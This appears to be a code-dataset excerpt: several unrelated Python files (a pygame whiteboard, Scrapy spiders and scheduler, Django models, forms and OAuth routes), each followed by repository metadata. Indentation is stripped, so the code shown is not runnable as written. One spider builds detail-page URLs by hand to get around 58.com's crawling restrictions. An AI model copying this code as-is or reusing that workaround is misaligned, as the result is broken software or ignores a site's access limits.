def handle_mouse_button_down(self, event):
"""
Get the coordinate of the circle's center when the user starts a click
"""
if event.dict["button"] != 1:
return
self.center = event.dict['pos']
def handle_all(self, event):
"""
Handle every event with the matching method via a chain of ifs
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up(coord=event.dict['pos'])
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down(event)
pygame.display.flip()
|
Python
| 431
| 36.016243
| 116
|
/src/tools.py
| 0.564749
| 0.558418
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import pygame
import pygame.draw
import json
import sys
from functools import reduce
import operator
from figures import TextBox, draw_line, draw_point, draw_textbox, draw_rect, draw_circle
from tools import Mode, ColorBox, Auth, Save, FontSizeBox, HandlePoint, HandleLine, HandleText, HandleRect, HandleCircle
import copy
'''
Load the initial configuration
'''
def dict_to_binary(the_dict):
str = json.dumps(the_dict)
return bytes(str, 'utf-8')
def binary_to_dict(binary):
try:
jsn = ''.join(binary.decode("utf-8"))
d = json.loads(jsn)
except (TypeError, json.decoder.JSONDecodeError) as e:
if isinstance(e, TypeError):
print("Le message reçu n'est pas du format attendu")
else:
print('Un paquet a été perdu')
return {"actions": [], "message": [], "auth": []}
return d
class WhiteBoard:
def __init__(self, client_name, start_config, start_hist=None):
"""
Whiteboard initialization : we build the GUI using the config file and the potential history of actions made by
other users. Returns a Whiteboard window ready to use.
:param client_name: Name of the client who just opened a new whiteboard window (str)
:param start_config: Whiteboard configuration stored in config.json and loaded as a dict (dict)
:param start_hist: History of actions by other users (dict)
"""
pygame.init()
if not isinstance(client_name, str):
raise TypeError("Client name must be a string")
if not isinstance(start_config, dict):
raise TypeError("Starting configuration file must be a dictionary")
if start_hist is None:
start_hist = {"actions": [], "message": [], "auth": []}
elif not isinstance(start_hist, dict):
raise TypeError("Starting history file must be a dictionary")
self._done = False
self._config = start_config
self._name = client_name
self._hist = start_hist
self.__screen = pygame.display.set_mode([self._config["width"], self._config["length"]])
self.__screen.fill(self._config["board_background_color"])
self.__handler = {"line": HandleLine(self),
"point": HandlePoint(self),
"text": HandleText(self),
"rect": HandleRect(self),
"circle": HandleCircle(self)}
pygame.draw.line(self.__screen, self._config["active_color"], [0, self._config["toolbar_y"]],
[self._config["width"], self._config["toolbar_y"]], 1)
# We create a global variable to keep track of the position of the last mode box we create in order to make
# sure that there is no overlapping between left and right boxes on the toolbar
"""
Draw the auth box, which grants the authorization to modify textboxes
"""
last_left_position = 0
last_right_position = self._config["width"] - self._config["mode_box_size"][0]
self._erasing_auth = False
try:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
self.__auth_box = Auth((last_left_position, 0), tuple(self._config["auth_box_size"]))
last_left_position += self._config["mode_box_size"][0]
self.__auth_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Draw the save box, which saves the image
"""
try:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
self.__save_box = Save((last_left_position, 0), tuple(self._config["auth_box_size"]))
last_left_position += self._config["mode_box_size"][0]
self.__save_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
self.__modes = [Mode("point", (2 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("line", (3 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("text", (4 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("rect", (5 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"])),
Mode("circle", (6 * self._config["mode_box_size"][0], 0), tuple(self._config["mode_box_size"]))
]
# If right and left boxes overlap, raise an error and close pygame
try:
for mod in self.__modes:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
mod.add(self.__screen)
last_left_position += self._config["mode_box_size"][0]
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Color choices
"""
self.__colors = []
try:
for key, value in self._config["color_palette"].items():
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
color_box = ColorBox(value, (last_right_position, 0), tuple(self._config["mode_box_size"]))
last_right_position -= self._config["mode_box_size"][0]
self.__colors.append(color_box)
color_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Pen thickness choices
"""
self.__font_sizes = []
try:
for size in self._config["pen_sizes"]:
assert last_left_position < last_right_position + 1, "Too many tools to fit in the Whiteboard " \
"toolbar, please increase width in config.json"
font_size_box = FontSizeBox(size, (last_right_position, 0), tuple(self._config["mode_box_size"]))
last_right_position -= self._config["mode_box_size"][0]
self.__font_sizes.append(font_size_box)
font_size_box.add(self.__screen)
except AssertionError as e:
print(e)
pygame.quit()
sys.exit()
"""
Initialization of the drawing variables
"""
pygame.display.flip()
self._draw = False
self._last_pos = None
self._mouse_position = (0, 0)
"""
Initialization of the text box parameters
"""
self._text_boxes = []  # This list will contain the TextBox objects
self.active_box = None
self.load_actions(self._hist)
self.__modification_allowed = copy.deepcopy(self._hist["auth"])
# if some client names are in this list, you will have the authorisation to edit their textboxes
for action in self._hist["actions"]:
if action["type"] == "Text_box":
self.append_text_box(TextBox(**action["params"]))
"""
Encapsulation
"""
def is_done(self):
return self._done
def end(self):
self._done = True
def get_config(self, maplist):
"""
Getter of config file. Uses a list of keys to traverse the config dict
:param maplist: list of keys from parent to child to get the wanted value (list)
:return: value of a key in the config file (object)
"""
if not type(maplist) == list:
maplist = list(maplist)
try:
return reduce(operator.getitem, maplist, self._config)
except (KeyError, TypeError):
return None
def set_config(self, maplist, value):
"""
Setter of config file. Uses the getter and assigns value to a key
:param maplist: list of keys from parent to child to get the wanted value (list)
:param value: value to set (object)
:return: None if failed
"""
if not type(maplist) == list:
maplist = list(maplist)
try:
self.get_config(maplist[:-1])[maplist[-1]] = value
except (KeyError, TypeError):
return None
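# Usage sketch for the two accessors above (keys assumed to exist in config.json):
# self.get_config(["text_box", "font_size"]) returns self._config["text_box"]["font_size"]
# self.set_config(["mode"], "line") sets self._config["mode"] = "line"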
def get_hist(self, key=None):
if key is None:
return self._hist
else:
return self._hist[key]
def add_to_hist(self, value):
self._hist["actions"].append(value)
@property
def screen(self):
return self.__screen
def clear_screen(self):
"""
Clear the screen by coloring it to background color. Does not color the toolbar
:return:
"""
self.__screen.fill(self.get_config(["board_background_color"]), (0, self.get_config(["toolbar_y"]) + 1,
self.get_config(["width"]),
self.get_config(["length"]) - self.get_config(
["toolbar_y"]) + 1))
def is_drawing(self):
return self._draw
def pen_up(self):
self._draw = False
def pen_down(self):
self._draw = True
@property
def name(self):
return self._name
@property
def modification_allowed(self):
return self.__modification_allowed
@property
def last_pos(self):
return self._last_pos
def reset_last_pos(self):
self._last_pos = None
def update_last_pos(self):
self._last_pos = self._mouse_position
def __get_mouse_position(self):
return self._mouse_position
def __set_mouse_position(self, value):
self._mouse_position = value
mouse_position = property(__get_mouse_position, __set_mouse_position)
def get_text_boxes(self):
return self._text_boxes
def append_text_box(self, textbox):
self._text_boxes.append(textbox)
def del_text_box(self, textbox):
self._text_boxes.remove(textbox)
def draw(self, obj, timestamp):
"""
Method to draw figures defined in figures.py. Also adds drawn objects to history.
:param obj: class of figure to draw
:param timestamp: timestamp at which the drawing happens
:return: None
"""
# Draw object on screen
obj.draw(self.__screen)
# Create dict containing object parameters and right timestamp to add to history
hist_obj = {"type": obj.type, "timestamp": timestamp, "params": obj.fetch_params(), "client": self._name}
# Special case if it's a Text_box object, we need to get the correct box id
if hist_obj["type"] == "Text_box":
hist_obj["id"] = obj.id_counter
hist_obj["owner"] = self._name
self.add_to_hist(hist_obj)
def switch_config(self, event):
"""
Switch between different modes
:param event: Action by the user : a mouse click on either modes, colors or font sizes
:return: None
"""
if event == "quit":
self.set_config(["mode"], "quit")
# We go through each mode, color and font size to see if that mode should be triggered by the event
else:
for mod in self.__modes:
if mod.is_triggered(event):
self.set_config(["mode"], mod.name)
for col in self.__colors:
if col.is_triggered(event):
self.set_config(["text_box", "text_color"], col.color)
self.set_config(["active_color"], col.color)
for font_size_ in self.__font_sizes:
if font_size_.is_triggered(event):
self.set_config(["font_size"], font_size_.font_size)
if self.__auth_box.is_triggered(event):
self._erasing_auth = not self._erasing_auth
self.__auth_box.switch(self.__screen, self._erasing_auth, self.__modification_allowed, self._name)
self._hist["auth"] = [self._name, self._erasing_auth]
if self.__save_box.is_triggered(event):
self.__save_box.save(self.__screen, self)
print("Le dessin a été sauvegardé dans le dossier")
def set_active_box(self, box, new=True):
"""
A method specific to text boxes : select an existing box or one that has just been created to edit. This box is
thus said to be "active"
:param box: instance of the TextBox class
:param new: boolean to specify if the box was just created or already existed
:return:
"""
# If the selected box is already the active one, do nothing
if box == self.active_box:
return
# If there is a box that is active we must turn it into "inactive"
if self.active_box is not None:
# Change its color to the "inactive color"
self.active_box.set_textbox_color(self.get_config(["text_box", "inactive_color"]))
# Select the id of previous active box
id_counter = self.active_box.id_counter
# Find the previous active box and change its color in history
for action in [x for x in self.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
action["params"]["text"] = self.active_box.get_textbox_text()
action['params']["box_color"] = self.get_config(["text_box", "inactive_color"])
# Render it
self.active_box.draw(self.__screen)
# If selected box already exists on the whiteboard we must turn it into "active"
if not new:
id_counter = box.id_counter
for action in [x for x in self.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
action['params']["box_color"] = self.get_config(["text_box", "active_color"])
# Draw the newly activated box
self.active_box = box
self.active_box.draw(self.__screen)
pygame.display.flip()
def draw_action(self, action):
"""
Draw the result of an action by the user on the whiteboard
:param action: usually a mouse action by the user
:return:
"""
if action["type"] == "Point":
draw_point(action["params"], self.__screen)
if action["type"] == "Line":
draw_line(action["params"], self.__screen)
if action["type"] == "Text_box":
draw_textbox(action["params"], self.__screen)
if action["type"] == "rect":
draw_rect(action["params"], self.__screen)
if action["type"] == "circle":
draw_circle(action["params"], self.__screen)
def load_actions(self, hist):
"""
Load actions from history
:param hist: list of dict representing the history of actions in the whiteboard session
:return:
"""
# Sort actions chronologically
sred = sorted(hist["actions"],
key=lambda value: value["timestamp"])
# Go through each action and draw it
for action in sred:
self.draw_action(action)
pygame.display.flip()
def start(self, connexion_avec_serveur):
"""
Start and run a whiteboard window
:param connexion_avec_serveur: socket to connect with server (socket.socket)
:return:
"""
# Initialize timestamp
last_timestamp_sent = 0
while not self.is_done():
# Browse all events done by user
for event in pygame.event.get():
# If user closes the window, quit the whiteboard
if self.get_config(["mode"]) == "quit":
self.end()
break
# Use specific handling method for current drawing mode
self.__handler[self.get_config(["mode"])].handle_all(event)
# msg_a_envoyer["message"] = "CARRY ON"
# Send dict history to server
if self._hist["auth"] != [self._name, self._erasing_auth]:
self._hist["auth"] = []
new_modifs = [modif for modif in self.get_hist()["actions"] if
(modif["timestamp"] > last_timestamp_sent and self._name == modif["client"])]
message_a_envoyer = {"message": "", 'actions': new_modifs, "auth": self._hist["auth"]}
connexion_avec_serveur.send(dict_to_binary(message_a_envoyer))
self._hist["auth"] = []
# Update last timestamp sent
if new_modifs:
last_timestamp_sent = max([modif["timestamp"] for modif in new_modifs])
# Dict received from server
try:
new_hist = binary_to_dict(connexion_avec_serveur.recv(2 ** 24))
except (ConnectionResetError, ConnectionAbortedError) as e:
print("Le serveur a été éteint, veuillez le relancer")
self._done = True
break  # the connection is gone and new_hist was never received, so leave the loop
# Consider actions made by another client after new_last_timestamp
new_actions = [action for action in new_hist["actions"] if action["client"] != self._name]
for action in new_actions:
# Here there are two cases, a new figure (point, line, rect, circle, new text box) is created or an
# existing text box is modified. For this second case, we use the variable "matched" as indicator
matched = False
if action["type"] == "Text_box":
# Find the text box id
for textbox in [x for x in self._hist["actions"] if x["type"] == "Text_box"]:
if action["id"] == textbox["id"]:
# Modify it with the newly acquired parameters from server
textbox["params"]["text"], textbox["params"]["w"] = action["params"]["text"], \
action["params"]["w"]
action_to_update_textbox = action
for element in self.get_text_boxes():
if element.id_counter == action["id"]:
self.del_text_box(element)
self.append_text_box(TextBox(**action_to_update_textbox["params"]))
# Draw the modified text box with updated parameters
self.clear_screen()
self.load_actions(self._hist)
matched = True
# If we are in the first case, we add the new actions to history and draw them
if not matched:
self.add_to_hist(action)
if action["type"] == "Text_box":
self.append_text_box(TextBox(**action["params"]))
self.draw_action(action)
if self._name in new_hist["auth"]:
new_hist["auth"].remove(self._name)
if new_hist["auth"] != self.__modification_allowed:
self.__modification_allowed = copy.deepcopy(new_hist["auth"])
pygame.display.flip()
# Once we are done, we quit pygame and send end message
pygame.quit()
print("Fermeture de la connexion")
message_a_envoyer["message"] = "END"
try:
connexion_avec_serveur.send(dict_to_binary(message_a_envoyer))
except (ConnectionResetError, BrokenPipeError) as e:
print("Il n'y a pas de message à envoyer au serveur")
connexion_avec_serveur.close()
def start_local(self):
"""
Starts Whiteboard locally. Used to test stuff and debug.
:return:
"""
while not self.is_done():
for event in pygame.event.get():
if self.get_config(["mode"]) == "quit":
self.end()
break
self.__handler[self.get_config(["mode"])].handle_all(event)
pygame.display.flip()
pygame.quit()
|
Python
| 515
| 39.850487
| 120
|
/src/white_board.py
| 0.542257
| 0.54007
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: blogroll
Description :
Author : JHao
date: 2020/10/9
-------------------------------------------------
Change Activity:
2020/10/9:
-------------------------------------------------
"""
__author__ = 'JHao'
sites = [
{"url": "https://www.zaoshu.io/", "name": "造数", "desc": "智能云爬虫"},
{"url": "http://brucedone.com/", "name": "大鱼的鱼塘", "desc": "大鱼的鱼塘 - 一个总会有收获的地方"},
{"url": "http://www.songluyi.com/", "name": "灯塔水母", "desc": "灯塔水母"},
{"url": "http://blog.topspeedsnail.com/", "name": "斗大的熊猫", "desc": "本博客专注于技术,Linux,编程,Python,C,Ubuntu、开源软件、Github等"},
{"url": "https://www.urlteam.org/", "name": "URL-team", "desc": "URL-team"},
]
|
Python
| 21
| 36.714287
| 121
|
/awssam/django-blog/src/django_blog/blogroll.py
| 0.42225
| 0.403287
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from scrapy_redis.spiders import RedisSpider
from scrapy.selector import Selector
class testSpider(RedisSpider):
name = 'testip'
redis_key = 'testip'
def parse(self,response):
response_selector = Selector(response)
code=response_selector.xpath(r'//div[contains(@class,"well")]/p[1]/code/text()')
print(code)
|
Python
| 10
| 35.700001
| 88
|
/tc_zufang/tc_zufang-slave/tc_zufang/spiders/testip.py
| 0.673913
| 0.668478
|
mrpal39/ev_code
|
refs/heads/master
|
from django.db import models
from tinymce.models import HTMLField
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
description =HTMLField()
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={'pk': self.pk})
class feeds(models.Model):
title = models.CharField(max_length=100)
overview = models.TextField(max_length=20)
timestamp = models.DateTimeField(auto_now_add=True)
description =HTMLField()
thumbnail = models.ImageField()
featured = models.BooleanField()
# content = HTMLField()
def __str__(self):
return self.title
class Products(models.Model):
title =models.CharField(max_length=100)
description =models.TextField(blank=True)
price =models.DecimalField(decimal_places=2,max_digits=1000)
summary =models.TextField(blank=False, null=False)
# featured =models.BooleanField()
class MyModel(models.Model):
...
content = HTMLField()
|
Python
| 56
| 22.214285
| 67
|
/awssam/ideablog/core/models.py
| 0.698999
| 0.686682
|
mrpal39/ev_code
|
refs/heads/master
|
import connection
import queue
from scrapy.utils.misc import load_object
from scrapy.utils.job import job_dir
SCHEDULER_PERSIST = False
QUEUE_CLASS = 'queue.SpiderQueue'
IDLE_BEFORE_CLOSE = 0
class Scheduler(object):
def __init__(self, server, persist,
queue_key, queue_cls, idle_before_close,
stats, *args, **kwargs):
self.server = server
self.persist = persist
self.queue_key = queue_key
self.queue_cls = queue_cls
self.idle_before_close = idle_before_close
self.stats = stats
def __len__(self):
return len(self.queue)
@classmethod
def from_crawler(cls, crawler):
if not crawler.spider.islinkgenerator:
settings = crawler.settings
persist = settings.get('SCHEDULER_PERSIST', SCHEDULER_PERSIST)
queue_key = "%s:requests" % crawler.spider.name
queue_cls = queue.SpiderQueue
idle_before_close = settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', IDLE_BEFORE_CLOSE)
server = connection.from_settings(settings, crawler.spider.name)
stats = crawler.stats
return cls(server, persist, queue_key, queue_cls, idle_before_close, stats)
else:
settings = crawler.settings
dupefilter_cls = load_object(settings['DUPEFILTER_CLASS'])
dupefilter = dupefilter_cls.from_settings(settings)
pqclass = load_object(settings['SCHEDULER_PRIORITY_QUEUE'])
dqclass = load_object(settings['SCHEDULER_DISK_QUEUE'])
mqclass = load_object(settings['SCHEDULER_MEMORY_QUEUE'])
logunser = settings.getbool('LOG_UNSERIALIZABLE_REQUESTS', settings.getbool('SCHEDULER_DEBUG'))
core_scheduler = load_object('scrapy.core.scheduler.Scheduler')
return core_scheduler(dupefilter, jobdir=job_dir(settings), logunser=logunser,
stats=crawler.stats, pqclass=pqclass, dqclass=dqclass, mqclass=mqclass)
def open(self, spider):
self.spider = spider
self.queue = self.queue_cls(self.server, spider, self.queue_key)
if len(self.queue):
spider.log("Resuming crawl (%d requests scheduled)" % len(self.queue))
def close(self, reason):
if not self.persist:
self.queue.clear()
connection.close(self.server)
def enqueue_request(self, request):
if self.stats:
self.stats.inc_value('scheduler/enqueued/rabbitmq', spider=self.spider)
self.queue.push(request)
def next_request(self):
request = self.queue.pop()
if request and self.stats:
self.stats.inc_value('scheduler/dequeued/rabbitmq', spider=self.spider)
return request
def has_pending_requests(self):
return len(self) > 0
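# Hypothetical wiring (module path assumed from this repo layout, not confirmed by the original):
# SCHEDULER = 'scrapy_packages.rabbitmq.scheduler.Scheduler'
# SCHEDULER_PERSIST = True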
|
Python
| 73
| 37.698631
| 107
|
/Web-UI/scrapyproject/scrapy_packages/rabbitmq/scheduler.py
| 0.635752
| 0.635044
|
mrpal39/ev_code
|
refs/heads/master
|
import scrapy
class MySpider(scrapy.Spider):
name = 'myspider'
start_urls = ['http://example.com']
def parse(self, response):
print(f"Existing settings: {self.settings.attributes.keys()}")
class MyExtension:
def __init__(self, log_is_enabled=False):
if log_is_enabled:
print("log is enabled!")
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings.getbool('LOG_ENABLED'))
|
Python
| 17
| 27.352942
| 70
|
/scrap/tutorial/scrap/spiders/testing.py
| 0.638254
| 0.638254
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from scrapy_redis.spiders import RedisSpider
from scrapy.selector import Selector
from tc_zufang.utils.result_parse import list_first_item
from scrapy.http import Request
from tc_zufang.utils.InsertRedis import inserintotc,inserintota
import re
defaultencoding = 'utf-8'
'''
Crawler for 58.com (58同城)
'''
# If the spider inherits from RedisSpider, start_urls can be read from redis
# If it inherits from BaseSpider, start_urls must be listed explicitly
class TczufangSpider(RedisSpider):
name='basic'
start_urls=(
'http://dg.58.com/chuzu/',
'http://sw.58.com/chuzu/',
'http://sz.58.com/chuzu/',
'http://gz.58.com/chuzu/',
# 'http://fs.58.com/chuzu/',
# 'http://zs.58.com/chuzu/',
# 'http://zh.58.com/chuzu/',
# 'http://huizhou.58.com/chuzu/',
# 'http://jm.58.com/chuzu/',
# 'http://st.58.com/chuzu/',
# 'http://zhanjiang.58.com/chuzu/',
# 'http://zq.58.com/chuzu/',
# 'http://mm.58.com/chuzu/',
# 'http://jy.58.com/chuzu/',
# 'http://mz.58.com/chuzu/',
# 'http://qingyuan.58.com/chuzu/',
# 'http://yj.58.com/chuzu/',
# 'http://sg.58.com/chuzu/',
# 'http://heyuan.58.com/chuzu/',
# 'http://yf.58.com/chuzu/',
# 'http://chaozhou.58.com/chuzu/',
# 'http://taishan.58.com/chuzu/',
# 'http://yangchun.58.com/chuzu/',
# 'http://sd.58.com/chuzu/',
# 'http://huidong.58.com/chuzu/',
# 'http:// boluo.58.com/chuzu/',
)
# redis_key = 'tczufangCrawler:start_urls'
# Parse the pages downloaded from start_urls
# Parsing a page has two purposes:
# First: extract the URL of the next page and pass it to the crawler scheduler as the crawler's next request
# Second: extract the detail page URLs, which are then parsed in a further step
redis_key = 'start_urls'
def parse(self, response):
# Get the URL that was visited
response_url=re.findall('^http\:\/\/\w+\.58\.com',response.url)
response_selector = Selector(response)
next_link=list_first_item(response_selector.xpath(u'//div[contains(@class,"pager")]/a[contains(@class,"next")]/@href').extract())
detail_link=response_selector.xpath(u'//div[contains(@class,"listBox")]/ul[contains(@class,"listUl")]/li/@logr').extract()
if next_link:
if detail_link:
# print next_link
# yield Request(next_link,callback=self.parse)
inserintotc(next_link, 1)
print('#########[success] the next link ' + next_link + ' is inserted into the redis queue#########')
for detail_link in response_selector.xpath(u'//div[contains(@class,"listBox")]/ul[contains(@class,"listUl")]/li/@logr').extract():
# gz_2_39755299868183_28191154595392_sortid:1486483205000 @ ses:busitime ^ desc @ pubid:5453707  58.com restricts crawling of its detail pages, so the detail page id is built by hand
# Build the detail page url
# detail_link='http://dg.58.com/zufang/'+detail_link.split('_')[3]+'x.shtml'
detail_link = response_url[0]+'/zufang/' + detail_link.split('_')[3] + 'x.shtml'
#对详情页进行解析cd
if detail_link:
inserintota(detail_link,2)
print('[success] the detail link ' + detail_link + ' is inserted into the redis queue')
|
Python
| 71
| 42.478874
| 138
|
/tc_zufang/tc_zufang/tc_zufang/spiders/tczufang_detail_spider.py
| 0.582955
| 0.545366
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class PropertiesPipeline(object):
def process_item(self, item, spider):
return item
ITEM_PIPELINES = {
'scrapy.pipelines.images.ImagesPipeline': 1,
'properties.pipelines.geo.GeoPipeline': 400,
}
IMAGES_STORE = 'images'
IMAGES_THUMBS = { 'small': (30, 30) }
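# Note: ITEM_PIPELINES, IMAGES_STORE and IMAGES_THUMBS are Scrapy settings that normally
# belong in the project's settings.py; they are presumably kept here only as a reference
# snippet next to the pipeline class.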
|
Python
| 20
| 22.35
| 65
|
/scrap/properties/properties/pipelines.py
| 0.706009
| 0.686695
|
mrpal39/ev_code
|
refs/heads/master
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django.contrib.auth.forms import PasswordChangeForm
class CreateProject(forms.Form):
projectname = forms.SlugField(label="Enter project name", max_length=50, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Create Project'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class DeleteProject(forms.Form):
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Confirm'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class CreatePipeline(forms.Form):
pipelinename = forms.SlugField(label="Pipeline name", max_length=50, required=True)
pipelineorder = forms.IntegerField(label="Order", required=True, min_value=1, max_value=900)
pipelinefunction = forms.CharField(label="Pipeline function:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class LinkGenerator(forms.Form):
function = forms.CharField(label="Write your link generator function here:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class Scraper(forms.Form):
function = forms.CharField(label="Write your scraper function here:", required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class ItemName(forms.Form):
itemname = forms.SlugField(label="Enter item name", max_length=50, required=True)
helper = FormHelper()
helper.form_tag = False
class FieldName(forms.Form):
fieldname = forms.SlugField(label="Field 1", max_length=50, required=False)
extra_field_count = forms.CharField(widget=forms.HiddenInput())
helper = FormHelper()
helper.form_tag = False
def __init__(self, *args, **kwargs):
extra_fields = kwargs.pop('extra', 0)
super(FieldName, self).__init__(*args, **kwargs)
self.fields['extra_field_count'].initial = extra_fields
for index in range(int(extra_fields)):
# generate extra fields in the number specified via extra_fields
self.fields['field_{index}'.format(index=index+2)] = forms.CharField(required=False)
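# Usage sketch (illustrative values): FieldName(extra=3) renders the base 'fieldname' input
# plus the dynamically generated inputs field_2, field_3 and field_4, with
# extra_field_count initialised to 3.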
class ChangePass(PasswordChangeForm):
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Change'))
class Settings(forms.Form):
settings = forms.CharField(required=False, widget=forms.Textarea)
helper = FormHelper()
helper.form_tag = False
class ShareDB(forms.Form):
username = forms.CharField(label="Enter the account name for the user with whom you want to share the database", max_length=150, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Share'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
class ShareProject(forms.Form):
username = forms.CharField(label="Enter the account name for the user with whom you want to share the project", max_length=150, required=True)
helper = FormHelper()
helper.form_method = 'POST'
helper.add_input(Submit('submit', 'Share'))
helper.add_input(Submit('cancel', 'Cancel', css_class='btn-default'))
|
Python
| 90
| 36.077778
| 147
|
/Web-UI/scrapyproject/forms.py
| 0.706535
| 0.70024
|
mrpal39/ev_code
|
refs/heads/master
|
# Generated by Django 3.1.3 on 2020-11-13 06:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0003_auto_20201113_0620'),
]
operations = [
migrations.AddField(
model_name='feeds',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='feeds',
name='overview',
field=models.TextField(max_length=20),
),
]
|
Python
| 23
| 22.304348
| 50
|
/awssam/ideablog/core/migrations/0004_auto_20201113_0633.py
| 0.559702
| 0.498134
|
mrpal39/ev_code
|
refs/heads/master
|
from django.conf.urls import url, include
import oauth2_provider.views as oauth2_views
from django.conf import settings
from .views import ApiEndpoint
from django.urls import include, path
# OAuth2 provider endpoints
oauth2_endpoint_views = [
path('authorize/', oauth2_views.AuthorizationView.as_view(), name="authorize"),
path('token/', oauth2_views.TokenView.as_view(), name="token"),
path('revoke-token/', oauth2_views.RevokeTokenView.as_view(), name="revoke-token"),
]
if settings.DEBUG:
# OAuth2 Application Management endpoints
oauth2_endpoint_views += [
path('applications/', oauth2_views.ApplicationList.as_view(), name="list"),
path('applications/register/', oauth2_views.ApplicationRegistration.as_view(), name="register"),
path('applications/<pk>/', oauth2_views.ApplicationDetail.as_view(), name="detail"),
path('applications/<pk>/delete/', oauth2_views.ApplicationDelete.as_view(), name="delete"),
path('applications/<pk>/update/', oauth2_views.ApplicationUpdate.as_view(), name="update"),
]
# OAuth2 Token Management endpoints
oauth2_endpoint_views += [
path('authorized-tokens/', oauth2_views.AuthorizedTokensListView.as_view(), name="authorized-token-list"),
path('authorized-tokens/<pk>/delete/', oauth2_views.AuthorizedTokenDeleteView.as_view(),
name="authorized-token-delete"),
]
urlpatterns = [
# OAuth 2 endpoints:
path('o/', include(oauth2_endpoint_views, namespace="oauth2_provider")),
path('api/hello', ApiEndpoint.as_view()), # an example resource endpoint
]
|
Python
| 35
| 44.857143
| 114
|
/awssam/iam/users/urls.py
| 0.702181
| 0.689097
|
mrpal39/ev_code
|
refs/heads/master
|
from django.http import HttpResponse, Http404
from django.shortcuts import render
import datetime
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
from django.contrib.auth.views import login as loginview
from registration.backends.simple import views
from django.contrib.auth import authenticate, get_user_model, login
from registration import signals
from scrapyproject.views import mongodb_user_creation, linux_user_creation
from scrapyproject.scrapy_packages import settings
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
User = get_user_model()
class MyRegistrationView(views.RegistrationView):
def register(self, form):
new_user = form.save()
new_user = authenticate(
username=getattr(new_user, User.USERNAME_FIELD),
password=form.cleaned_data['password1']
)
#perform additional account creation here (MongoDB, local Unix accounts, etc.)
mongodb_user_creation(getattr(new_user, User.USERNAME_FIELD), form.cleaned_data['password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_creation(getattr(new_user, User.USERNAME_FIELD), form.cleaned_data['password1'])
except:
pass
login(self.request, new_user)
signals.user_registered.send(sender=self.__class__,
user=new_user,
request=self.request)
return new_user
def get_success_url(self, user):
return "/project"
def custom_login(request):
if request.user.is_authenticated():
return HttpResponseRedirect('/project')
else:
return loginview(request)
def custom_register(request):
if request.user.is_authenticated():
return HttpResponseRedirect('/project')
else:
register = MyRegistrationView.as_view()
return register(request)
|
Python
| 67
| 30.194031
| 107
|
/Web-UI/mysite/views.py
| 0.677033
| 0.673684
|
mrpal39/ev_code
|
refs/heads/master
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scrapyproject', '0004_pipeline_pipeline_function'),
]
operations = [
migrations.RemoveField(
model_name='project',
name='settings',
),
migrations.AddField(
model_name='project',
name='settings_link_generator',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='project',
name='settings_scraper',
field=models.TextField(blank=True),
),
]
|
Python
| 28
| 23.785715
| 61
|
/Web-UI/scrapyproject/migrations/0005_auto_20170213_1053.py
| 0.56196
| 0.554755
|
mrpal39/ev_code
|
refs/heads/master
|
# Generated by Django 3.1.3 on 2020-11-14 04:52
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('core', '0005_feeds_content'),
]
operations = [
